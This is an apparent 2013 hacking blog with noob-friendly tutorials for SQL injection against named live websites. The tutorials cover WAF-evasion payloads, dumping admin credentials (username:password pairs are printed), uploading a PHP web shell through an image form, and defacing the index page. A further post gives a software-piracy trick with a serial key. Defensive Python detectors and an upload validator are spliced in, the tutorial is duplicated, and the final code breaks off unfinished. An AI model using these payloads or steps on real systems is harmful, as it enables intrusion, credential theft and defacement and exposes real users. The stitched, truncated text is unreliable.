Monday, 20 May 2013
Labels:
Tutorials
How to bypass WAF ( Web Application Firewall ) in SQL injection.
Hi friends,
I hope you are all well. I have seen many people run into 404 forbidden errors when they try to inject a website that sits behind a good WAF through SQL injection, so I decided to share a tutorial written by my friend :P P4K M4D HUNT3R-Z St!k3r. It shows how you can bypass, or at least get an idea of how to bypass, a WAF's 404 forbidden response in SQL injection. The tutorial is noob friendly and assumes you have some basic knowledge of the SQL injection attack method; if not, read about that first: CLICK HERE.
So let's start.
We have our target, which has a WAF, so we will try to bypass it and get the admin username and password :D
http://www.gogame.co.in/news.php?id=189
Now we will check whether this site is vulnerable to SQL injection.
Just add ' at the end of the site URL:
http://www.gogame.co.in/news.php?id=189'
Nothing changed?
Try adding it before the number:
http://www.gogame.co.in/news.php?id=%27189
If still nothing happens to the page, leave the site and move on to the next one.
But luckily I don't need to move on; this site is vulnerable.
http://www.gogame.co.in/news.php?id=189'
After adding the ', the page output changed:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
Now you can see this message on the page,
which means this site can be hacked.
------------------------------------------------------------------------------------------------
step 2 :
Finding the admin panel
Now you need to find the admin panel of this site to log in as its administrator.
The admin panel is the area where the site's administrator logs in and maintains the site.
There are some tools available for this,
but for the tutorial I will use this online admin-finding site:
http://scan.subhashdasyam.com/admin-panel-finder.php
Now we will paste the site link there,
which is http://www.gogame.co.in/
and click on dump!
It will start looking for the website's admin panel; after 2 or 3 minutes it will give you the result.
Now
http://www.gogame.co.in/admin/ is shown in green and all the rest are red,
which means http://www.gogame.co.in/admin/ is the admin panel of this website.
Now open this page.
It asks us to enter a username and password to log in.
We will find the username and password in the next step.
-------------------------------------------------------------------------------------------------
step 3 :
Now we need the username and password to log in, so we will use
http://www.gogame.co.in/news.php?id=189'
this again. Now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
Does the page remain the same?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
Same?
Continue until an error is displayed on the page.
http://www.gogame.co.in/news.php?id=189' order by 4--+-
Same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns
This means there is no 5th column,
so there are 4 columns.
We have the column count; now we will find the vulnerable column.
Write
http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
Oops, 403 forbidden!
mod security :P
Now we will bypass this shit.
Actually, words like select are forbidden.
When you hit enter, the request has to go through the firewall, and select is forbidden, so it will deny the command.
So we have to trick it by using our brain.
In the database, symbols like / * ! ` ~ ( ) are not supported.
So if we add an extra symbol to select, the firewall will allow it, and we can trick it:
http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P
Now you can see 2 3 4 on the page as the vulnerable columns.
These three numbers are displayed on the page,
which means these three numbers are vulnerable columns.
Now we will use these numbers to display the username and password of the website's admin panel on the page.
Now just change a little thing here.
Choose any number from the vulnerable columns and change it to "group_concat(table_name)",
like I do:
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-
and after 6 add "from Information_schema.tables",
like this:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
Now press enter.
Oops,
403 forbidden again!
We need to trick some more words:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
It seems group_concat is not working, so we will use only concat now:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
Bypassed.
Now, instead of the number 2, the column will show table names, like this:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
This means it is showing us the table names.
But we need the username and password, which are located in the website's database,
so we will also use
database to extract the username and password.
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
Just add one more clause after information_schema.tables,
which is "where table_schema=database()",
like this:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
Now the page
is showing the database's tables:
Adminlogin
These are the tables.
Now we will send the query to open the adminlogin table.
Change "(table_name)" to "(column_name)",
"information_schema.tables" to "information_schema.columns",
"table_schema" to "table_name"
and "database()" to "login".
But it will not work, because it will not accept the table name after "Table_name=",
so we need to trick the site.
We will use decimal numbers instead of the table name.
We will convert the word Login to decimal numbers so that it will accept it.
For this you can use this site:
http://www.branah.com/ascii-converter
Here you can convert any word to hex, decimal and binary, so we will type L o g i n in the ASCII converter box.
Put a space between every letter of login, because the website needs spaced numbers,
and click on convert.
It now shows us the result in the decimal box,
which is
97 100 109 105 110 108 111 103 105 110
Now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
Just add "CHAR" and a , after every 3 numbers.
Now we will use this instead of login,
so it will be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
Oops, 403 again.
table_name is forbidden.
Bypass:
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
The page shows the result:
usnd pdgame
This means these are the columns of the table adminlogin.
Now we will simply send the query to give us the username and password on the page.
Just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all the words and add "adminlogin".
0x3a is the hex-encoded form of : and separates the username from the password in the output.
It would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
The page shows this result:
kolgo:gamekol
which means
the 1st user is
username=kolgo
password=gamekol
Now that we have the password, we will move to the admin panel to hack the website.
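The requests in step 3 get past the keyword rule because MySQL executes the text inside `/*! ... */` as SQL and treats `/**/` as whitespace, while a rule that matches the literal words `union select` never sees them adjacent. The following is an added example for defenders, not part of the original tutorial: it normalizes a query string the way MySQL would read it before applying signatures, and runs over constructed access-log lines that reuse the request shapes from this post. The rule names, the naive rule and the log lines are assumptions made for illustration, not ModSecurity's own rules.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# MySQL runs the text inside /*! ... */ (optionally /*!50000 ... */) as SQL,
# so a detector has to look inside these comments instead of skipping them.
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
# Ordinary /* ... */ comments only separate tokens, like whitespace.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Signatures are applied to the normalized text (hypothetical rule names).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s*(all\s*)?\bselect\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*(--|#)"),
    "char_literal": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)"),
}

# A keyword rule of the kind the post defeats: decoded input, no unwrapping.
NAIVE_RULE = re.compile(r"\bunion\s+select\b")

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def normalize(raw_query):
    """Decode and rewrite a query string into what the SQL parser will see."""
    text = unquote_plus(raw_query)
    for _ in range(2):                       # catch double URL-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()
    text = EXEC_COMMENT.sub(r" \1 ", text)   # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)      # plain comment -> whitespace
    return re.sub(r"\s+", " ", text).strip()


def classify(raw_query):
    """Return the sorted names of all signatures that hit after normalizing."""
    text = normalize(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def naive_match(raw_query):
    """What the keyword-only rule sees: URL-decoded but not unwrapped."""
    return bool(NAIVE_RULE.search(unquote_plus(raw_query).lower()))


def scan(log_lines):
    """Classify every request line; unparseable lines are skipped."""
    results = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target, status = m.group(1), int(m.group(2))
        query = urlsplit(target).query
        results.append({"target": target, "status": status,
                        "naive": naive_match(query),
                        "hits": classify(query)})
    return results


# Constructed sample log (combined-log style, documentation IP address).
P = '203.0.113.7 - - [20/May/2013:10:00:00 +0000] '
SAMPLE_LOG = [
    P + '"GET /news.php?id=189 HTTP/1.1" 200 5120',
    P + '"GET /news.php?id=189%20order%20by%204--+- HTTP/1.1" 200 5120',
    P + '"GET /news.php?id=-189%20union%20select%201,2,3,4--+- HTTP/1.1" 403 310',
    P + '"GET /news.php?id=-189%20union%20/*!select*/%201,2,3,4-- HTTP/1.1" 200 5200',
    P + '"GET /news.php?id=189%20union%20/*!select*/%201,concat/*!(table_name)*/'
        ',3,4%20from%20Information_schema/**/.tables--+- HTTP/1.1" 200 5300',
    P + '"GET /search.php?q=student+union+elections HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["status"], "naive" if r["naive"] else "-----", r["hits"], r["target"])
```

A request that scores a hit here but returned 200 after an earlier 403 from the same client is the sequence this post produces, and is worth alerting on.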
IMPORTANT NOTE :
This tutorial is for educational purposes only; we are not responsible for how you use it. Be aware.
don't forget to comment ;)
Thursday, 9 May 2013
Labels:
Tricks
Registering IDM without any patch or crack.
Hello friends, I hope you are all fine :D
Today I want to share a trick written by my friend madCodE. In this trick we are going to register IDM, which is one of the best download managers out there :D,
to the full version without using a crack or patch! Interesting, no? :D
So let's start
1) First of all, if you have any antivirus, deactivate it, because we are going to edit the c:/windows/system32/drivers/etc/hosts file.
2) Right-click on it and select the Security tab.
Now press the Edit button and, under the Users option, select the Full control option and save it.
3) Now double-click on the hosts file. It will ask how to open the file; use Notepad to open it.
4) Now paste these lines into the hosts file and save it:
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
5) Now open IDM > Registration >
first name = Haxor
last name = Kakka
email = haxor.py@facebook.com
serial = GZLJY-X50S3-0S20D-NFRF9
And hit enter :D Voila, you have registered IDM without any patch or crack :D
enjoy ;)
Labels:
Tutorials
A tutorial by one of my best friends. It will guide you through how an SQLi vulnerability can be used to hack a target :D Noob-friendly tut :D
Like Str!k3r official team Page.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step: find an SQL-vulnerable site.
To find a site to hack you will need google.com.
We will use a Google dork to find sites.
The dork will be INURL:
The task of this dork is to find the given words in URL addresses,
so it will find the given words in a website's URL address bar.
Go to google.com
and type this:
inurl:news.php?nws=
This search will show the sites that have the page news.php?nws=
Now you get many results on the page.
Now open the 1st site,
like mine is http://www.area96.it/news.php?nws=61
Now we will check whether this site is vulnerable to SQL injection.
Just add ' at the end of the site URL:
http://www.area96.it/news.php?nws=61'
Nothing changed?
Try adding it before the number:
http://www.area96.it/news.php?nws=%2761
Still nothing happened?
http://www.area96.it/news.php?nws"61
If still nothing happens to the page, leave the site and move on to the next one.
But luckily I don't need to move on; this site is vulnerable.
http://www.area96.it/news.php?nws=61'
After adding the ', the page output changed.
Now you can see this message on the page:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
This means the site can be hacked.
------------------------------------------------------------------------------------------------
step 2 :
Finding the admin panel
Now you need to find the admin panel of this site to log in as its administrator.
The admin panel is the area where the site's administrator logs in and maintains the site.
There are some tools available for this,
but for the tutorial I will use this online admin-finding site:
http://scan.subhashdasyam.com/admin-panel-finder.php
Now we will paste the site link there,
which is http://www.area96.it/
and click on dump!
It will start looking for the website's admin panel; after 2 or 3 minutes it will give you the result.
Now
http://www.area96.it/admin/index.php is shown in green and all the rest are red,
which means http://www.area96.it/admin/index.php is the admin panel of this website.
Now open this page:
http://www.area96.it/admin/index.php
It asks us to enter a username and password to log in.
We will find the username and password in the next step.
-------------------------------------------------------------------------------------------------
step 3 :
Now we need the username and password to log in, so we will use
http://www.area96.it/news.php?nws=61'
this again. Now write
http://www.area96.it/news.php?nws=61' order by 1--+-
Does the page remain the same?
http://www.area96.it/news.php?nws=61' order by 2--+-
Same?
Continue until an error is displayed on the page.
http://www.area96.it/news.php?nws=61' order by 6--+-
Same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
This means there is no 7th column,
so there are 6 columns.
We have the column count; now we will find the vulnerable column.
Write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
Still the same?
Add a - sign before the number:
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
Now
2
1
6
These three numbers are displayed on the page,
which means these three numbers are vulnerable columns.
Now we will use these numbers to display the username and password of the website's admin panel on the page.
Now just change a little thing here.
Choose any number from the vulnerable columns and change it to "group_concat(table_name)",
like I do:
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables",
like this:
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
Now press enter.
Now, instead of the number 2, the column will show table names, like this:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
This means it is showing us the table names.
But we need the username and password, which are located in the website's database,
so we will also use
database to extract the username and password.
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
Just add one more clause after information_schema.tables,
which is "where table_schema=database()",
like this:
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
Now the page
is showing the database's tables:
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
These are the tables.
Now we need to guess which table might contain the username and password information.
I guess "login",
so we will look at the login table first.
Now we will send the query to open the login table.
Change "(table_name)" to "(column_name)",
"information_schema.tables" to "information_schema.columns",
"table_schema" to "table_name"
and "database()" to "login".
But it will not work, because it will not accept the table name after "Table_name=",
so we need to trick the site.
We will use decimal numbers instead of the table name.
We will convert the word Login to decimal numbers so that it will accept it.
For this you can use this site:
http://www.branah.com/ascii-converter
Here you can convert any word to hex, decimal and binary, so we will type L o g i n in the ASCII converter box.
Put a space between every letter of login, because the website needs spaced numbers,
and click on convert.
It now shows us the result in the decimal box,
which is
108 111 103 105 110
Now change it to
CHAR(108, 111, 103, 105, 110)
Just add "CHAR" and a , after every 3 numbers.
Now we will use this instead of login,
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
The page shows the result:
id_login,username,password,email,admin,abilitato,id_friends
This means these are the columns of the table "login".
We need only the username and password to log in at the admin panel, so
now we will simply send the query to give us the username and password on the page.
Just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all the words and add "login".
0x3a is the hex-encoded form of : and separates the username from the password in the output.
It would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
The page shows this result:
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
which means
the 1st user is
username=davide
password=cippalippa
the 2nd user is
username=curvedair
password=oblivion
etc.
Now that we have the password, we will move to the admin panel to hack the website.
-------------------------------------------------------------------------------------------------
step 4:
Go to
http://www.area96.it/admin/index.php
and log in with the username and password you just got:
username=davide
password=cippalippa
Logged in successfully!
Now you have access to change the website's products, news, etc.
But to take full control we need to upload a shell to the website.
shell: a shell is a kind of control panel which gives you access to do whatever you want on the site.
A shell is scripted in such a way that it gives you access to do whatever you want with the website's hard drive.
There are many shells available, but I will use, and recommend you use,
MADSPOTSHELL.
It is the 1st Pakistani shell and the world's best shell!
You can download it from here:
http://www.mediafire.com/?8b6dmgdo7edkus2
Now find any area from which you can upload this shell, like
add image, add product, etc.
I have an option here to add news,
and it gives me the option of adding an image for the news.
I will try to upload madspotshell.php from the image upload section.
Just enter the news; when it asks for an image, select madspotshell.php instead of an image.
Uploaded successfully!
Now just find the shell's location.
Normally it shows an error icon in place of the image.
Right-click on the error icon, select copy image URL/copy image location
and paste it into the address bar, like mine is
http://www.area96.it/images/news/1352954638mad.php
Hit enter.
Shell opened!
Now you can remove, add or edit any file from here.
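Step 4 works because the news form accepted a `.php` file in an image field, kept the client's extension in the stored name (`1352954638mad.php`) and served it from a directory where PHP executes. The following is an added example for defenders, not part of the original tutorial: a server-side check that rejects that upload and always chooses the stored name itself. The function name, the allowlist and the sample byte strings are assumptions constructed for illustration.

```python
import os
import secrets
from typing import Tuple

# Allowlisted image types and the magic bytes each file must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_ALIASES = {"jpeg": "jpg"}

# Extensions a web server may hand to an interpreter. They are refused
# anywhere in the name, because "x.php.jpg" can still execute under some
# handler configurations.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar",
                   "asp", "aspx", "jsp", "cgi", "pl", "py", "sh"}


def validate_image_upload(client_name: str, data: bytes) -> Tuple[bool, str]:
    """Return (True, stored_name) or (False, reason).

    The stored name is generated server-side and never reuses any part of
    the client-supplied name, so the client cannot choose the extension.
    """
    base = os.path.basename(client_name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"

    ext = EXT_ALIASES.get(parts[-1], parts[-1])
    if ext not in MAGIC:
        return False, "extension not allowed"
    if any(p in EXECUTABLE_EXTS for p in parts[1:-1]):
        return False, "executable extension in name"

    # The content has to be the type the extension claims.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"

    # Heuristic for image/script polyglots. Re-encoding the image and serving
    # uploads from a directory with script execution disabled are the
    # stronger controls; this check only catches the obvious case.
    if b"<?php" in data.lower():
        return False, "embedded script marker"

    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs (inert placeholders, not real files).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
JPG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 32
SCRIPT_BYTES = b"<?php /* constructed placeholder */ ?>"
POLYGLOT_GIF = b"GIF89a" + SCRIPT_BYTES

if __name__ == "__main__":
    samples = [
        ("madspotshell.php", SCRIPT_BYTES),
        ("photo.png", PNG_BYTES),
        ("shell.php.jpg", JPG_BYTES),
        ("pic.gif", POLYGLOT_GIF),
        ("pic.png", POLYGLOT_GIF),
    ]
    for name, blob in samples:
        print(name, validate_image_upload(name, blob))
```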
-------------------------------------------------------------------------------------------------
last step :
Now you are in the shell
and you need to hack this site.
The site's default page is index.
Whenever you open a site, like the target site
http://www.area96.it/
it runs on http://www.area96.it/index.php
so you will need to change the index.php file.
In the shell you are in the directory where the shell was uploaded.
I uploaded my shell from the image section, so it is in
http://www.area96.it/images/news/
At the low top
you can see this:
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which shows your current directory.
You need to edit index.php, which is located at area96.it,
so click on area96.it in
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line.
It will open the PWD: /home/area96/area96.it/ |CURRENT|
directory.
Now in the center you can see the files located in the folder,
including index.php.
Just rename your deface page to index.php and upload it here.
It will overwrite the file, and when someone opens the site it will show your deface page instead of the site.
The upload button is at the bottom of the shell.
Just replace index.php in /home/area96/area96.it/ |CURRENT
and the site is hacked!
Now open the website and see whether your name is there or not:
http://www.area96.it/
Hacked BY Str!k3r !
----------------------------------------------------------------------------------------------
NOTE : this post is just to share knowledge and is for educational purposes only. No one will be responsible if you do something stupid and get caught by the cops!
Try at your own risk.
-----------------------------------------------------------------------------------------------
Sqli Hacking + Noob Friendly Tutorial
A tutorial By one of my best friend this tutorial will guide you that how you can use sqli vulnerability to hack a target :D noob friendly tut :D
Like Str!k3r official team Page.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com
type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=
now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.area96.it/news.php?nws=61'
nothing change ?
try to add before number
http://www.area96.it/news.php?nws=%2761
still nothing happened ?
http://www.area96.it/news.php?nws"61
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.area96.it/news.php?nws=61'
by adding this ' the result of page changed !
now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
Error! Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
This means there is no 7th column!
So there are 6 columns!
We have the column count; now we will find the vulnerable columns!
Write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
Still the same?
Add a - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
Now
2
1
6
these three numbers are displayed on the page!
This means these three numbers are the vulnerable columns, the ones whose values the page prints.
Now we will use these numbers to display the username and password of the website's admin panel on the page!
Now just change a little thing here:
choose any number from the vulnerable columns and change it to "group_concat(table_name)"
like I do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables",
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
Now press Enter.
Now, instead of the number 2, the page shows table names, like this:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
This means it is showing us table names.
But we need the username and password, which are located in the website's own database,
so we will also use
database() to extract the username and password!
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
Just add one more clause after information_schema.tables,
which is "where table_schema=database()",
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
Now the page
shows the database's tables:
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
These are the tables.
Now we need to guess which table may contain the username and password information!
I guess "login",
so we will look at the login table first!
Now we will send the query to open the login table!
Change "(table_name)" to "(column_name)",
"information_schema.tables" to "information_schema.columns",
"table_schema" to "table_name"
and "database()" to "login".
But it will not work, because the site will not accept the name of a table after "Table_name=",
so we need to trick the site:
we will use decimal numbers instead of the table name!
We will convert the word Login to decimal numbers so that it will accept it!
For this you can use this site:
http://www.branah.com/ascii-converter
From here you can convert any word to hex, decimal and binary, so we will type L o g i n in the ASCII converter box.
Leave a space between every letter of login, because the website needs spaced numbers,
and click on convert!
It now shows us the result in the decimal box,
which is
108 111 103 105 110
Now change it to
CHAR(108, 111, 103, 105, 110)
Just add "CHAR" and a , after every number!
Now we will use this instead of login!
So it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
The page shows the result:
id_login,username,password,email,admin,abilitato,id_friends
This means these are the columns of the table "login".
We need only the username and password to log in at the admin panel, so
now we will simply send the query to give us the username and password on the page!
Just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all the words and add "login".
0x3a is the hex form of : and it separates the username from the password in the output.
It would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
The page shows this result:
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
This means
the 1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
Now that we have the password, we will move to the admin panel to hack the website.
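Seen from the server side, step 3 leaves a distinctive trail in the access log: the same parameter carrying a rising ORDER BY index, then UNION SELECT against information_schema. The following Python sketch is an added example, not part of the original tutorial; it flags that sequence in combined-format access logs, and the rule names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# One rule per request shape that appears in step 3 (rule names are made up here).
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char_literal": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
    "sql_comment_tail": re.compile(r"--(?:\s|$)"),
}

def scan(lines):
    """Group rule hits by client IP and record which ORDER BY indexes each one probed."""
    report = defaultdict(lambda: {"rules": set(), "order_by": set()})
    for m in filter(None, map(LOG_RE.match, lines)):
        # parse_qsl percent-decodes and turns '+' into a space, as the server does.
        for _param, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
            hits = {name for name, rx in RULES.items() if rx.search(value)}
            if hits:
                entry = report[m["ip"]]
                entry["rules"] |= hits
                entry["order_by"] |= {int(n) for n in re.findall(r"order\s+by\s+(\d+)", value, re.I)}
    return dict(report)

def is_enumeration(entry):
    """True for a column-count walk (2+ ORDER BY indexes) or UNION SELECT on the schema catalog."""
    return len(entry["order_by"]) >= 2 or {"union_select", "schema_enum"} <= entry["rules"]

# Constructed sample lines (documentation IP ranges), not taken from a real log.
_T = '- - [20/May/2013:10:00:00 +0000] "GET /news.php?nws='
SAMPLE_LOG = [
    "198.51.100.4 " + _T + '62 HTTP/1.1" 200 4800',
    "203.0.113.7 " + _T + '61%27%20order%20by%206--+- HTTP/1.1" 200 5120',
    "203.0.113.7 " + _T + '61%27%20order%20by%207--+- HTTP/1.1" 200 310',
    "203.0.113.7 " + _T + "-61%27%20union%20select%201,group_concat(table_name),3,4,5,6"
    '%20from%20information_schema.tables--+- HTTP/1.1" 200 5400',
    "203.0.113.9 " + _T + 'order+by+phone HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, is_enumeration(entry), sorted(entry["rules"]), sorted(entry["order_by"]))
```

The benign "order by phone" request is not flagged because the probe rule requires a numeric column index, and the response-size drop on the failing ORDER BY request is a second signal worth correlating.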
-------------------------------------------------------------------------------------------------
Step 4:
Go to
http://www.area96.it/admin/index.php
and log in with the username and password you just got!
username=davide
password=cippalippa
Logged in successfully!
Now you have access to change the website's products, news, etc.
But to take full control we need to upload a shell to the website!
Shell: a shell is a kind of control panel which gives you access to do whatever you want on the site!
A shell is scripted in such a way as to give you access to do whatever you want with the hard drive of the website!
There are many shells available, but I will use, and recommend you use,
MADSPOTSHELL
It's the 1st Pakistani shell and the world's best shell!
You can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
Now find any area from which you can upload this shell, like
add image, add product, etc.
I have an option here to add news,
and it gives me the option of adding an image to the news!
I will try to upload madspotshell.php from the image upload section!
Just enter the news; it will ask for an image. Select madspotshell.php instead of an image!
Uploaded successfully!
Now just find the shell location!
Normally it shows an error icon in place of the image.
Right-click on the error icon, select copy image URL/copy image location
and paste it into the address bar; mine is
http://www.area96.it/images/news/1352954638mad.php
Hit Enter!
Shell opened!
Now you can remove, add or edit any file from here!
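Step 4 works only because the news-image field accepts a .php file and stores it in a web-served directory under an executable name. The following Python check is an added example, not code from the original post or the affected site; the function names, size limit and storage layout are assumptions. It shows upload handling that blocks this: an extension allowlist, a content-signature check and a server-generated file name.

```python
import os
import secrets

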